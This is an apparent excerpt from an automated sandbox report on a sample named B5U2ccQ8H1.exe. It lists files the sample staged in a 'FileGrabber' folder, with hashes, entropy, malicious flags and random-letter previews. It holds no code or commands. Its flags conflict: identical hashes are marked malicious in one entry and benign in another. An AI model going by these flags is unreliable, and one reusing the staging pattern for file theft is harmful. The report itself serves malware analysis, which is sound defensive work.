Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\Users\user\AppData\Roaming\928100\FileGrabber\Desktop\KATAXZVCPS.xlsx

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	false
Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\Users\user\AppData\Roaming\928100\FileGrabber\Desktop\NWTVCDUMOB.jpg

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696250160603532
Encrypted:	false
SSDEEP:	24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
MD5:	2B6A90B7D410E3A4E2B32C90D816B4FE
SHA1:	B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
SHA-256:	D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
SHA-512:	03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
Malicious:	false
Preview:	NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH

C:\Users\user\AppData\Roaming\928100\FileGrabber\Desktop\ONBQCLYSPU.docx

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\Users\user\AppData\Roaming\928100\FileGrabber\Desktop\ONBQCLYSPU\HTAGVDFUIE.png

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692693183518806
Encrypted:	false
SSDEEP:	24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
MD5:	78F042E25B7FAF970F75DFAA81955268
SHA1:	F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
SHA-256:	E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
SHA-512:	CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
Malicious:	false
Preview:	HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

C:\Users\user\AppData\Roaming\928100\FileGrabber\Desktop\ONBQCLYSPU\KATAXZVCPS.jpg

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	false
Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\Users\user\AppData\Roaming\928100\FileGrabber\Desktop\ONBQCLYSPU\ONBQCLYSPU.docx

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\Users\user\AppData\Roaming\928100\FileGrabber\Desktop\ONBQCLYSPU\UMMBDNEQBN.pdf

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	true
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\Users\user\AppData\Roaming\928100\FileGrabber\Desktop\ONBQCLYSPU\VLZDGUKUTZ.xlsx

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Roaming\928100\FileGrabber\Desktop\UMMBDNEQBN.pdf

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\Users\user\AppData\Roaming\928100\FileGrabber\Desktop\VLZDGUKUTZ.docx

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOF